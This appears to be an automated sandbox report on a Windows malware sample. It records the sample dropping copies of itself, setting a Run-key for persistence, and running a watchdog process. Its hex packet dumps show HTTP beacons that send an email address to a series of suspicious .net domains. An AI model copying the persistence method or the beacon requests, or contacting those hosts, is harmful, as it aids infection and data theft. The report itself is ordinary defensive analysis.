Analysis Date2014-10-01 16:59:30

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 1b672f70bcd669bcf753c67fc5c0233a sha1: 25c9238348456fe516948eecc0eb6d814345335e size: 296960
Section.rdata md5: e92a966f09a2da29a17c6fd8c9bd68a4 sha1: b26a430c05a00ee7d9c17d063c0cb1f164e4f374 size: 35328 md5: 7a9e3815fc78192848e97c8e56e1060b sha1: 4010e6ca6cbebbc48efe3d66d547cd72d1d46040 size: 105472
Timestamp2014-07-24 05:39:50
PackerMicrosoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Encrypting Card Link-Layer Biometric ➝
C:\Documents and Settings\Administrator\Application Data\vopqpfgb\iqtktxxpw.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\vopqpfgb\iqtktxxpw.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\vopqpfgb\iqtktxxpw.exe

↳ C:\Documents and Settings\Administrator\Application Data\vopqpfgb\iqtktxxpw.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\vopqpfgb\iqtktxxpw.xug
Creates FileC:\Documents and Settings\Administrator\Application Data\vopqpfgb\xwvjuvjjvgoq.exe
Creates File\Device\Afd\Endpoint
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\vopqpfgb\iqtktxxpw.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\vopqpfgb\iqtktxxpw.exe"

Network Details:
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Flows TCP192.168.1.1:1031 ➝
Flows TCP192.168.1.1:1032 ➝
Flows TCP192.168.1.1:1033 ➝
Flows TCP192.168.1.1:1034 ➝
Flows TCP192.168.1.1:1035 ➝
Flows TCP192.168.1.1:1036 ➝
Flows TCP192.168.1.1:1037 ➝
Flows TCP192.168.1.1:1038 ➝
Flows TCP192.168.1.1:1039 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d746672 61737572 6540636f   mail=tfrasure@co
0x00000020 (00032)   6d636173 742e6e65 74266d65 74686f64
0x00000030 (00048)   3d706f73 74204854 54502f31 2e300d0a   =post HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a20666f 72776172 64737472   Host: forwardstr
0x00000070 (00112)   65616d2e 6e65740d 0a0d0a    

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d746672 61737572 6540636f   mail=tfrasure@co
0x00000020 (00032)   6d636173 742e6e65 74266d65 74686f64
0x00000030 (00048)   3d706f73 74204854 54502f31 2e300d0a   =post HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a206465 67726565 626f7474   Host: degreebott
0x00000070 (00112)   6c652e6e 65740d0a 0d0a0a    

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d746672 61737572 6540636f   mail=tfrasure@co
0x00000020 (00032)   6d636173 742e6e65 74266d65 74686f64
0x00000030 (00048)   3d706f73 74204854 54502f31 2e300d0a   =post HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a20676c 61737373 74726561   Host: glassstrea
0x00000070 (00112)   6d2e6e65 740d0a0d 0a0a0a    

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d746672 61737572 6540636f   mail=tfrasure@co
0x00000020 (00032)   6d636173 742e6e65 74266d65 74686f64
0x00000030 (00048)   3d706f73 74204854 54502f31 2e300d0a   =post HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a20676c 61737362 6f74746c   Host: glassbottl
0x00000070 (00112)   652e6e65 740d0a0d 0a0a0a    

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d746672 61737572 6540636f   mail=tfrasure@co
0x00000020 (00032)   6d636173 742e6e65 74266d65 74686f64
0x00000030 (00048)   3d706f73 74204854 54502f31 2e300d0a   =post HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a206c65 61646572 73747265   Host: leaderstre
0x00000070 (00112)   616d2e6e 65740d0a 0d0a0a    

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d746672 61737572 6540636f   mail=tfrasure@co
0x00000020 (00032)   6d636173 742e6e65 74266d65 74686f64
0x00000030 (00048)   3d706f73 74204854 54502f31 2e300d0a   =post HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a207265 7475726e 73747265   Host: returnstre
0x00000070 (00112)   616d2e6e 65740d0a 0d0a0a    

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d746672 61737572 6540636f   mail=tfrasure@co
0x00000020 (00032)   6d636173 742e6e65 74266d65 74686f64
0x00000030 (00048)   3d706f73 74204854 54502f31 2e300d0a   =post HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a206465 67726565 62757369   Host: degreebusi
0x00000070 (00112)   6e657373 2e6e6574 0d0a0d0a  

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d746672 61737572 6540636f   mail=tfrasure@co
0x00000020 (00032)   6d636173 742e6e65 74266d65 74686f64
0x00000030 (00048)   3d706f73 74204854 54502f31 2e300d0a   =post HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a20666f 72776172 64627573   Host: forwardbus
0x00000070 (00112)   696e6573 732e6e65 740d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d746672 61737572 6540636f   mail=tfrasure@co
0x00000020 (00032)   6d636173 742e6e65 74266d65 74686f64
0x00000030 (00048)   3d706f73 74204854 54502f31 2e300d0a   =post HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a20676c 61737362 7573696e   Host: glassbusin
0x00000070 (00112)   6573732e 6e65740d 0a0d0a0d 0a

00-+ CC
         (((((                  H
1@s	T`T
An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
bad allocation
bad exception
 Base Class Array'
 Base Class Descriptor at (
 Class Hierarchy Descriptor'
 Complete Object Locator'
`copy constructor closure'
- CRT not initialized
dddd, MMMM dd, yyyy
`default constructor closure'
DOMAIN error
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
- floating point support not loaded
invalid string position
j h`KE
j@j ^V
}$k	^/
 )k6u ]Lm
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
Microsoft Visual C++ Runtime Library
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
`omni callsig'
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
+t HHt
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
< tK<	tG
TLOSS error
t$<"u	3
 Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'
v	N+D$
